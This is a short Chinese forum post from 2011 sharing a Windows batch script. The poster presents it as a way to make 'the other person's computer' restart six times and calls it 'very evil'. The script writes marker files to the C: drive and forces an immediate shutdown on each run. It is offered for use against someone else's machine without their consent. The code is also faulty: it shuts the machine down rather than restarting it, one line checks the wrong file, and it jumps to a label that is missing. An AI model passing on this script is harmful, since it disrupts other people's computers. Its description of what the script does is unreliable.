[ post] @echo off
if not exist c:\1.txt echo. >c:\1.txt & goto err1
if not exist c:\2.txt echo. >c:\2.txt & goto err1
if not exist c:\3.txt echo. >c:\3.txt & goto err1
if not exist c:\4.txt echo. >c:\4.txt & goto err1
if not exist c:\5.txt echo. >c:\5.txt & goto err1
if not exist c:\5.txt echo. >c:\6.txt & goto err1
goto err2
:err1
shutdown -s -t 0
复制上面的源码 保存批处理 可以让对方的电脑重启6次 很邪恶的
[ 此贴被最致命的傷口在2011-06-12 23:52重新编辑 ]